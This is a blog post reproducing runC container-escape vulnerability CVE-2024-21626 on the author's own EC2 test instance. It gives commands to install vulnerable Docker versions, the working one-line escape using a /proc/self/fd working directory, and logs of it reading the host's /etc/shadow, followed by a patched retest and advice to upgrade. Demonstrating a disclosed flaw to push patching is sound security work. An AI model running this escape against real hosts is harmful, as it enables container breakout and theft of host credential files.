Illustrate runC Escape Vulnerability CVE-2024–21626 with my tests
CVE-2024–21626
The vulnerability CVE-2024–21626 allows an attacker to escape containers
For runC, a container runtime component, published version 1.1.12 to fix CVE-2024-21626 at 31, Jan 2024, which leads to escaping from containers. The range of affected versions are >= v1.0.0-rc93, <=1.1.11.
For containerd, the fixed versions are 1.6.28 and 1.7.13, the range of affected versions are 1.4.7 to 1.6.27 and 1.7.0 to 1.7.12.
For Docker, the fixed version is 25.0.2.
Run the test in AWS EC2 instance, RHEL-8 AMI image from AWS marketplace
# Use Redhat 8 as sample
$ yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
# to install the older versions,
# before docker service is installed,
# you need install containerd service first
$ yum list containerd.io --showduplicates
# install docker engine, so containerd is not in the list,
# because it has been installed (with old version)
# run the list command with "--showduplicates"
$ yum list docker-ce --showduplicates
...
# if you want to know all dependencies for "docker-ce" you can run
# yum install docker-ce, but don't confirm with "Y"
# So the final installation commands are
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install containerd.io-1.6.27-3.1.el8 \
docker-buildx-plugin-0.10.5-1.el8 \
docker-compose-plugin-2.20.2-1.el8 \
docker-ce-cli-1:24.0.4-1.el8 \
docker-ce-rootless-extras-24.0.4-1.el8 \
docker-ce-3:24.0.4-1.el8
enable docker service
$ sudo systemctl start docker
$ sudo systemctl enable docker
# Post-installation steps for Linux.
# for example, set ssm-user with docker run permission
# if the group is exist, ignore the error
$ sudo groupadd docker
$ sudo usermod -aG docker ssm-user
Show the docker versions, they are all older versions, which can be used to duplicate the issue now
sh-4.4$ docker version
Client: Docker Engine - Community
Version: 24.0.4
API version: 1.43
Go version: go1.20.5
Git commit: 3713ee1
Built: Fri Jul 7 14:52:00 2023
OS/Arch: linux/amd64
Context: default
Server: Docker Engine - Community
Engine:
Version: 24.0.4
API version: 1.43 (minimum version 1.12)
Go version: go1.20.5
Git commit: 4ffc614
Built: Fri Jul 7 14:51:01 2023
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: 1.6.27
GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
runc:
Version: 1.1.11
GitCommit: v1.1.11-0-g4bccb38
docker-init:
Version: 0.19.0
GitCommit: de40ad0
sh-4.4$
Run the test
I tested several times,
- /proc/self/fd/7
- /proc/self/fd/8
- /proc/self/fd/9
Finally successfully run the container with /proc/self/fd/9
docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
So it can view the host’s /etc/hostname and /etc/shadow, from a container, without mount any folders from host at all.
- ip-10–140–11–6.ap-southeast-2.compute.internal
- ssm-user:!!:19760:7:365:7:30::
These are only exist in aws ec2 instance.
Run test with latest docker versions
remove old package and install latest dockers
# clean old version
$ sudo yum remove docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
# install latest version
$ sudo yum install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
# star docker service
$ sudo systemctl start docker
sh-4.4$ docker version
Client: Docker Engine - Community
Version: 25.0.3
API version: 1.44
Go version: go1.21.6
Git commit: 4debf41
Built: Tue Feb 6 21:15:16 2024
OS/Arch: linux/amd64
Context: default
Server: Docker Engine - Community
Engine:
Version: 25.0.3
API version: 1.44 (minimum version 1.24)
Go version: go1.21.6
Git commit: f417435
Built: Tue Feb 6 21:14:12 2024
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: 1.6.28
GitCommit: ae07eda36dd25f8a1b98dfbf587313b99c0190bb
runc:
Version: 1.1.12
GitCommit: v1.1.12-0-g51d5e94
docker-init:
Version: 0.19.0
GitCommit: de40ad0
When run same command , I can’t run the container, then I just run a container without -w /proc/self/fd/8
$ docker run --name cve --rm -it debian:bookworm bash
root@5d48184c930d:/proc/self/fd# ls
0 1 2 255
# I can't view these files from host server now
All logs for your reference
sh-4.4$ docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
Unable to find image 'debian:bookworm' locally
bookworm: Pulling from library/debian
6a299ae9cfd9: Pull complete
Digest: sha256:79becb70a6247d277b59c09ca340bbe0349af6aacb5afa90ec349528b53ce2c9
Status: Downloaded newer image for debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/8: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/7 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
sh-4.4$ docker run -w /proc/self/fd/6 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/6: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# ls -F
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
blkio/ cpu@ cpu,cpuacct/ cpuacct@ cpuset/ devices/ freezer/ hugetlb/ memory/ net_cls@ net_cls,net_prio/ net_prio@ perf_event/ pids/ rdma/ systemd/
root@a3238ac6f149:.# ls ../../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin boot data dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
root@a3238ac6f149:.# ls ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/hostname
root@a3238ac6f149:.# ls ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/shadow
root@a3238ac6f149:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
ip-10-140-11-6.ap-southeast-2.compute.internal
root@a3238ac6f149:.# cat ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root:*:19324:0:99999:7:::
bin:*:19324:0:99999:7:::
daemon:*:19324:0:99999:7:::
adm:*:19324:0:99999:7:::
lp:*:19324:0:99999:7:::
sync:*:19324:0:99999:7:::
shutdown:*:19324:0:99999:7:::
halt:*:19324:0:99999:7:::
mail:*:19324:0:99999:7:::
operator:*:19324:0:99999:7:::
games:*:19324:0:99999:7:::
ftp:*:19324:0:99999:7:::
nobody:*:19324:0:99999:7:::
dbus:!!:19725::::::
systemd-coredump:!!:19725::::::
systemd-resolve:!!:19725::::::
tss:!!:19725::::::
polkitd:!!:19725::::::
unbound:!!:19725::::::
sssd:!!:19725::::::
chrony:!!:19725::::::
sshd:!!:19725::::::
ec2-user:!!:19759:0:99999:7:::
cwagent:!!:19759::::::
rpc:!!:19759:7:365:7:30::
rpcuser:!!:19759::::::
splunk:!!:19759:7:365:7:30::
ssm-user:!!:19760:7:365:7:30::
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
Conculsion
The vulnerability CVE-2024–21626 not only enable malicious actors to escape containerized environments but also allow for full control over the underlying host system.
Please upgrade (yum or apt) your operation system as soon as possible. But it is too new currently, maybe the patch is not ready yet for some Operation Systems, and if your OS has been EOL, then no patch for this CVE any more.
Reference
Nitro’s Blog: Illustrate runC Escape Vulnerability CVE-2024–21626
Containers inherit breakout bugs in Linux tools
Redhat CVE Status — CVE-2024–21626
Ubuntu CVE status — CVE-2024–21626
Learning is fun
# CVE-2024–21626 # Security # Docker # Kubernetes